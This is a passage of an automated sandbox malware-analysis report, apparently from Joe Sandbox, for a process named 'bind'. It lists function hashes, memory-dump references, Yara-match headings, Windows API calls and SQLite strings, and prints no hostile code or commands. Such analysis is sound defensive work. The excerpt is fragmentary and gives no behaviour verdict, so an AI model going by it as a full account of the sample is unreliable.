                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 022544c5bab4e80ebc368de094496e61a9d5a7671904987aeebc0969a1496ca6
                                                                                                                                                                                      • Instruction ID: 07b2ba47510eaf75a7002707a8f197228055a8add64b29abdf90bfe12792e0ed
                                                                                                                                                                                      • Opcode Fuzzy Hash: 022544c5bab4e80ebc368de094496e61a9d5a7671904987aeebc0969a1496ca6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B414E7190021A9FCF16DF94D8929ADBBF1BF06314F1144BEE625AF651D730AE40CB52
                                                                                                                                                                                      Function 61E2A652 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: realloc
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 471065373-0
                                                                                                                                                                                      • Opcode ID: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
                                                                                                                                                                                      • Instruction ID: 4040ac9b910eb7d7724dfc403353a0a40a3fe088e4c24dccbd46c39564703f2d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
                                                                                                                                                                                      • Instruction Fuzzy Hash: C3F0F97180530A9FDB109F55C58195DFBE8EF84268F14C86DE8984B310D374E544CF91
                                                                                                                                                                                      Function 0034F83B Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1699248803-0
                                                                                                                                                                                      • Opcode ID: 49b371766f4d3178843f51514eae9ff7a43332bc46d07d4a8d7c49a071288536
                                                                                                                                                                                      • Instruction ID: 3cef17ed605714508578d67b2967a9100766a2706b1b3a420dbd1b1a48e69bc6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 49b371766f4d3178843f51514eae9ff7a43332bc46d07d4a8d7c49a071288536
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75E0C97591014CABDF11DBA4DC949AEB7FDAB48204F0085A1A909D7290E630EB469B50
                                                                                                                                                                                      Function 0034F80B Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 9a24f30ef9416102be3b109d3539cd6f02a5409695c751d4359d8345c258106c
                                                                                                                                                                                      • Instruction ID: 11a7bf38af195e29a6e90864c7ecd63c71918de218a1528f771777fb35485c5e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a24f30ef9416102be3b109d3539cd6f02a5409695c751d4359d8345c258106c
                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD0C2315001245A862167B8EC414BE774CDD123B47560230FC0ADE091D620FA02C2C0
                                                                                                                                                                                      Function 61E0AE03 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                      • Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
                                                                                                                                                                                      • Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
                                                                                                                                                                                      • Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91
                                                                                                                                                                                      Function 61E2A6AF Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                                      • Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
                                                                                                                                                                                      • Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Function 61E4304E Relevance: 31.5, APIs: 1, Strings: 19, Instructions: 1527COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: za$H$M$Q{a$ROWID$aggregate$ambiguous column name$excluded$false$main$new$no such column$non-deterministic functions$old$parameters$subqueries$the "." operator$true$window
                                                                                                                                                                                      • API String ID: 0-995943838
                                                                                                                                                                                      • Opcode ID: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
                                                                                                                                                                                      • Instruction ID: 1d323ea87534b4984c39532d96b7a68bc5a2d3eb5612128e3b04e89f7f046be3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AF25A74A042658FEB20CF68D980B99BBF1BF49308F24C5DAD8999B391D770E985CF50
                                                                                                                                                                                      Function 61E94783 Relevance: 22.4, Strings: 17, Instructions: 1152COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                      • String ID: , ?$4$8a$@Da$__langid$_content$bua$bua$bua$compress$content$fts3$rowid$simple$uncompress$va$a
                                                                                                                                                                                      • API String ID: 1294909896-3798220086
                                                                                                                                                                                      • Opcode ID: 2119f446b8a753b6ee91c4f32a73f07abde53b9e9f4791bdb401906cb03614ce
                                                                                                                                                                                      • Instruction ID: ef7f48c3fdd7dc8ca6414c769173e2ec05d9438d07e734940b1c5d50411cadd4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2119f446b8a753b6ee91c4f32a73f07abde53b9e9f4791bdb401906cb03614ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: 40C2B0B49083598FDB10CFA8C58479DBBF1AF88318F2589AED898AB341D774D985CF41
                                                                                                                                                                                      Function 61E9E24F Relevance: 17.1, Strings: 13, Instructions: 869COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: bua$bua$config$content$data$docsize$id INTEGER PRIMARY KEY, block BLOB$id INTEGER PRIMARY KEY, sz BLOB$idx$k PRIMARY KEY, v$rowid$segid, term, pgno, PRIMARY KEY(segid, term)$version
                                                                                                                                                                                      • API String ID: 0-2268357529
                                                                                                                                                                                      • Opcode ID: c027d0dd600d488911ade3015ef1b01bc4a252b854e2efd1cea36245f32c4c9b
                                                                                                                                                                                      • Instruction ID: f9c2f8dafde392a94833a84278d27f7abaf5337b7a20f26a6dc113648fca896e
                                                                                                                                                                                      • Opcode Fuzzy Hash: c027d0dd600d488911ade3015ef1b01bc4a252b854e2efd1cea36245f32c4c9b
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE8206B49046499FDB10CFA9C18079DBBF1BF89318F25C92EE894AB395D774D881CB42
                                                                                                                                                                                      Function 61EA2F47 Relevance: 11.8, APIs: 2, Strings: 5, Instructions: 1261COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: DELETE from$UPDATE$content$docsize$optimize
                                                                                                                                                                                      • API String ID: 1475443563-624765053
                                                                                                                                                                                      • Opcode ID: 771806b29ef72f59f754b5a686d1791b255bd140e1d9e921a47c54c426f6639a
                                                                                                                                                                                      • Instruction ID: 70c6a14bc8af06d6aef6aa9ad5cb9e7fc1cc1a093b7b28355e50790c232760be
                                                                                                                                                                                      • Opcode Fuzzy Hash: 771806b29ef72f59f754b5a686d1791b255bd140e1d9e921a47c54c426f6639a
                                                                                                                                                                                      • Instruction Fuzzy Hash: ABC2F674A042598FDB10DFA8C980B8DBBF1BF88308F2585A9D849AB345D774ED85CF81
                                                                                                                                                                                      Function 61E88FCA Relevance: 9.6, Strings: 7, Instructions: 866COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: UNIQUE$BINARY$bua$index$invalid rootpage$sqlite_master$sqlite_temp_master
                                                                                                                                                                                      • API String ID: 0-1733444394
                                                                                                                                                                                      • Opcode ID: 2f8d3c9bf28d88cb8a71b4b5b7ed41c19bc202f8b39fc1aea3eaff7862733210
                                                                                                                                                                                      • Instruction ID: c52f25025489653eb610d6e343a086c80a5a7374dd8721026aec1ef0af0b0df4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8d3c9bf28d88cb8a71b4b5b7ed41c19bc202f8b39fc1aea3eaff7862733210
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1892F174E08255CFDB51CFA8C580B99BBF1BF89308F65C1A9E859AB352D734E881CB41
                                                                                                                                                                                      Function 61E56F18 Relevance: 9.6, APIs: 5, Strings: 1, Instructions: 606COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: NEAR
                                                                                                                                                                                      • API String ID: 1475443563-1088024997
                                                                                                                                                                                      • Opcode ID: 8b567820edb5981adc55974c97c4ab7292800c8f9629d994c9b363bfa805e60a
                                                                                                                                                                                      • Instruction ID: b4e98ac7f2dea276e522b18a44adf406a464a3194d3be0cff96e2c83306ccf13
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b567820edb5981adc55974c97c4ab7292800c8f9629d994c9b363bfa805e60a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 464234B4D08289CFDB80CFA8C18479DBBF1BB49308FA4C45AD8549B345D776E8A6CB51
                                                                                                                                                                                      Function 61E64E0C Relevance: 9.5, Strings: 5, Instructions: 3235COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
